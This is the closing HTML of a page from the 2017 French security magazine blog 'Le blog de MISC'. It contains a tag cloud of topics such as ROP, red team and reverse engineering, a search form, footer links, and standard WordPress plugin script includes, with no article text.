<a href="http://www.miscmag.com/?tag=outils" class="tag-cloud-link tag-link-18 tag-link-position-23" style="font-size: 8pt;" aria-label="outils (1 élément)">outils</a>
<a href="http://www.miscmag.com/?tag=paiement" class="tag-cloud-link tag-link-13 tag-link-position-24" style="font-size: 8pt;" aria-label="paiement (1 élément)">paiement</a>
<a href="http://www.miscmag.com/?tag=partenariat" class="tag-cloud-link tag-link-8 tag-link-position-25" style="font-size: 8pt;" aria-label="partenariat (1 élément)">partenariat</a>
<a href="http://www.miscmag.com/?tag=publicite" class="tag-cloud-link tag-link-33 tag-link-position-26" style="font-size: 8pt;" aria-label="publicité (1 élément)">publicité</a>
<a href="http://www.miscmag.com/?tag=red-team" class="tag-cloud-link tag-link-22 tag-link-position-27" style="font-size: 8pt;" aria-label="red team (1 élément)">red team</a>
<a href="http://www.miscmag.com/?tag=reverse-engineering" class="tag-cloud-link tag-link-36 tag-link-position-28" style="font-size: 8pt;" aria-label="reverse engineering (1 élément)">reverse engineering</a>
<a href="http://www.miscmag.com/?tag=rop" class="tag-cloud-link tag-link-45 tag-link-position-29" style="font-size: 14.3pt;" aria-label="ROP (2 éléments)">ROP</a>
<a href="http://www.miscmag.com/?tag=reseau" class="tag-cloud-link tag-link-25 tag-link-position-30" style="font-size: 18.5pt;" aria-label="réseau (3 éléments)">réseau</a>
<a href="http://www.miscmag.com/?tag=smart-cities" class="tag-cloud-link tag-link-35 tag-link-position-31" style="font-size: 8pt;" aria-label="smart cities (1 élément)">smart cities</a>
<a href="http://www.miscmag.com/?tag=social-engineering" class="tag-cloud-link tag-link-29 tag-link-position-32" style="font-size: 8pt;" aria-label="social engineering (1 élément)">social engineering</a>
<a href="http://www.miscmag.com/?tag=spam" class="tag-cloud-link tag-link-37 tag-link-position-33" style="font-size: 14.3pt;" aria-label="spam (2 éléments)">spam</a>
<a href="http://www.miscmag.com/?tag=securite" class="tag-cloud-link tag-link-17 tag-link-position-34" style="font-size: 14.3pt;" aria-label="sécurité (2 éléments)">sécurité</a>
<a href="http://www.miscmag.com/?tag=usurpation" class="tag-cloud-link tag-link-40 tag-link-position-35" style="font-size: 14.3pt;" aria-label="Usurpation (2 éléments)">Usurpation</a>
<a href="http://www.miscmag.com/?tag=vie-privee" class="tag-cloud-link tag-link-21 tag-link-position-36" style="font-size: 8pt;" aria-label="vie privée (1 élément)">vie privée</a>
<a href="http://www.miscmag.com/?tag=web" class="tag-cloud-link tag-link-31 tag-link-position-37" style="font-size: 14.3pt;" aria-label="web (2 éléments)">web</a>
<a href="http://www.miscmag.com/?tag=windows" class="tag-cloud-link tag-link-19 tag-link-position-38" style="font-size: 8pt;" aria-label="windows (1 élément)">windows</a></div>
</aside><aside id="search-2" class="widget widget_search"><h1 class="widget-title">Rechercher</h1>	<form method="get" id="searchform" action="http://www.miscmag.com/" role="search">
		<label for="s" class="assistive-text">Rechercher</label>
		<input type="text" class="field" name="s" id="s" placeholder="Rechercher &hellip;" />
		<input type="submit" class="submit" name="submit" id="searchsubmit" value="Rechercher" />
	</form>
</aside>		</div><!-- #secondary .widget-area -->

	</div><!-- #main -->

	<footer id="colophon" class="site-footer" role="contentinfo">
		
		
				<nav role="navigation" class="footer-navigation">
			<div class="menu-menu-bas-de-page-container"><ul id="menu-menu-bas-de-page" class="menu"><li id="menu-item-28" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-28"><a target="_blank" href="http://boutique.ed-diamond.com/">BOUTIQUE</a></li>
<li id="menu-item-29" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29"><a target="_blank" href="http://www.editions-diamond.fr/index.php/magazines/annonceur">ANNONCEURS</a></li>
<li id="menu-item-270" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-270"><a href="http://www.editions-diamond.fr/devenir-auteur/">CONTRIBUER</a></li>
<li id="menu-item-27" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27"><a href="http://www.miscmag.com/?page_id=9">À PROPOS</a></li>
</ul></div>		</nav>
				
		<div class="site-info">

						
			2017 Le blog de MISC <span class="sep">-</span> Propulsé par  <a href="http://wordpress.org/" title="Plate-forme de publication personnelle sémantique de pointe">WordPress</a> <span class="sep">-</span> Thème Mon Cahier par <a href="http://bluelimemedia.com/" title="Bluelime Media">Bluelime Media</a>
			

		</div><!-- .site-info -->
	</footer><!-- .site-footer .site-footer -->
</div><!-- #page .hfeed .site -->

<script type='text/javascript' src='http://www.miscmag.com/wp-content/themes/mon-cahierMISC/js/small-menu.js?ver=20120206'></script>
<script type='text/javascript' src='http://www.miscmag.com/wp-includes/js/comment-reply.min.js?ver=4.8.1'></script>
<script type='text/javascript' src='http://www.miscmag.com/wp-content/plugins/dvk-social-sharing/assets/js/script.min.js?ver=1.2.7'></script>
<script type='text/javascript' src='http://www.miscmag.com/wp-includes/js/wp-embed.min.js?ver=4.8.1'></script>
<script type='text/javascript' src='http://www.miscmag.com/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.js?ver=1.6'></script>
<script type='text/javascript' src='http://www.miscmag.com/wp-content/plugins/easy-fancybox/js/jquery.easing.min.js?ver=1.4.0'></script>
<script type='text/javascript' src='http://www.miscmag.com/wp-content/plugins/easy-fancybox/js/jquery.mousewheel.min.js?ver=3.1.13'></script>
<script type="text/javascript">
jQuery(document).on('ready post-load', function(){ jQuery('.nofancybox,a.pin-it-button,a[href*="pinterest.com/pin/create/button"]').addClass('nolightbox'); });
jQuery(document).on('ready post-load',easy_fancybox_handler);
jQuery(document).on('ready',easy_fancybox_auto);</script>
<!-- Générer en 0,678 secondes. Faites 39 les requêtes de base de données et 75 les requêtes de la mémoire cache. Mémoire utilisée - 29.48MB -->
<!-- Cached by DB Cache Reloaded Fix -->
</body>
</html>